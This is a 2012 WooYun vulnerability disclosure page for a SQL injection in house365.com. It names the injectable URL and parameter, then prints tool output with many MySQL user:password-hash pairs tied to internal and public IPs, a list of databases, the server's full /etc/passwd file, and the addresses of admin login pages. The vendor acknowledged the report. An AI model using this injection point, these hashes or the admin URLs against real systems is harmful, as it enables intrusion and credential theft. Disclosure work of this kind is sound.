当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-010549

漏洞标题:365地产家居网SQL注射漏洞

相关厂商:365地产家居网

漏洞作者: se55i0n

提交时间:2012-08-08 17:27

修复时间:2012-09-22 17:28

公开时间:2012-09-22 17:28

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2012-08-08: 细节已通知厂商并且等待厂商处理中
2012-08-08: 厂商已经确认,细节仅向厂商公开
2012-08-18: 细节向核心白帽子及相关领域专家公开
2012-08-28: 细节向普通白帽子公开
2012-09-07: 细节向实习白帽子公开
2012-09-22: 细节向公众公开

简要描述:

sql注射,不解释!

详细说明:

哎,一个服务器上多个house365.com的库;个城市的house365.com后台具有通用性极易猜解;太累了,就不一个一个去破解密码了!!!
测试注入点:http://wh.house365.com/xiaoqu/block_details.php?bid=58

漏洞证明:

Host IP:	121.52.227.37
Web Server: 	Apache
DB Server: 	MySQL
Current User: 	root@172.17.1.82
Sql Version: 	5.1.51-log
Current DB: 	wh_house
System User: 	root@172.17.1.82
Host Name: 	2sf_db_bak2
Installation dir: /service/mysql/
DB User & Pass: root:*DE861DC96983B6BC6620E30F91674C75277906F0:localhost
		root::2sf_db_bak2
		root::127.0.0.1
		::localhost
		::2sf_db_bak2
		root:*DE861DC96983B6BC6620E30F91674C75277906F0:172.17.1.51
		root:*DE861DC96983B6BC6620E30F91674C75277906F0:172.17.1.174
		root:5f0c21d3626f1d71:172.17.1.187
		root:5f0c21d3626f1d71:172.17.1.205
		root:5f0c21d3626f1d71:172.17.1.81
		root:5f0c21d3626f1d71:172.17.1.210
		myadm:26afe479587e2980:172.17.1.210
		myadm:26afe479587e2980:172.17.1.81
		myadm:26afe479587e2980:172.17.1.205
		myadm:26afe479587e2980:172.17.1.187
		root:*DE861DC96983B6BC6620E30F91674C75277906F0:172.17.1.201
		root:*DE861DC96983B6BC6620E30F91674C75277906F0:172.17.1.176
		root:5f0c21d3626f1d71:172.17.1.208
		root:5f0c21d3626f1d71:172.17.1.34
		root:5f0c21d3626f1d71:172.17.1.231
		root:*DE861DC96983B6BC6620E30F91674C75277906F0:221.226.121.114
		root:5f0c21d3626f1d71:221.226.121.162
		root:*DE861DC96983B6BC6620E30F91674C75277906F0:172.17.1.76
		root:5f0c21d3626f1d71:172.17.1.2
		root:5f0c21d3626f1d71:172.17.1.203
		root:*DE861DC96983B6BC6620E30F91674C75277906F0:172.17.1.232
		binlog:*D2F4F42A31551369CD7B4086C993EA9BDE75F46E:202.91.250.136
		root:5f0c21d3626f1d71:172.17.1.56
		myadm:26afe479587e2980:172.17.1.208
		root:*DE861DC96983B6BC6620E30F91674C75277906F0:180.99.144.244
		root:5f0c21d3626f1d71:172.17.1.233
		root:5f0c21d3626f1d71:172.17.1.73
		root:5f0c21d3626f1d71:172.17.1.72
		root:5f0c21d3626f1d71:172.17.1.71
		myadm:26afe479587e2980:172.17.1.71
		myadm:26afe479587e2980:172.17.1.72
		myadm:26afe479587e2980:172.17.1.73
		root:*DE861DC96983B6BC6620E30F91674C75277906F0:172.17.1.48
		root:*DE861DC96983B6BC6620E30F91674C75277906F0:172.17.1.171
		root:*DE861DC96983B6BC6620E30F91674C75277906F0:172.17.1.172
		root:*DE861DC96983B6BC6620E30F91674C75277906F0:172.17.1.173
		binlog:*D2F4F42A31551369CD7B4086C993EA9BDE75F46E:115.238.101.235
		root:*DE861DC96983B6BC6620E30F91674C75277906F0:172.17.1.67
		root:*DE861DC96983B6BC6620E30F91674C75277906F0:172.17.1.113
		myadm:*DE861DC96983B6BC6620E30F91674C75277906F0:172.17.1.67
		root:*DE861DC96983B6BC6620E30F91674C75277906F0:221.231.141.140
		root:5f0c21d3626f1d71:172.17.1.82
Data Bases: 	information_schema
		cz_house
		hf_house
		house
		hz_house
		hz_house_20120227
		hz_house_bak
		hz_house_bak_20120227
		ks_house
		mysql
		sz_house
		sz_house_back
		sz_house_bak
		test
		wh_house
		wh_house_old
		wx_house
		xa_house


root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP 
User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
nscd:x:28:28:NSCD 
Daemon:/:/sbin/nologin
vcsa:x:69:69:virtual console memory 
owner:/dev:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
oprofile:x:16:16:Special user account to be 
used by OProfile:/home/oprofile:/sbin/nologin
sshd:x:74:74:Privilege-separated 
SSH:/var/empty/sshd:/sbin/nologin
rpcuser:x:29:29:RPC Service 
User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:4294967294:4294967294:Anonymous NFS 
User:/var/lib/nfs:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
xfs:x:43:43:X Font 
Server:/etc/X11/fs:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
avahi-autoipd:x:100:104:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin
webroot:x:500:500::/home/webroot:/sbin/nologin
mysql:x:501:501::/home/mysql:/sbin/nologin
squid:x:502:502::/home/squid:/bin/bash
public:x:503:503::/home/public:/bin/bash
zabbix:x:504:504::/home/zabbix:/sbin/nologin


部分后台地址:http://wh.house365.com/admincp/login.php
http://xa.house365.com/admincp/login.php
http://cz.house365.com/admin/
http://hz.house365.com/admin/

修复方案:

过滤,隐藏后台!

版权声明:转载请注明来源 se55i0n@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2012-08-08 21:12

厂商回复:

感谢 se55i0n@乌云 的提交,我们自查中!

最新状态:

暂无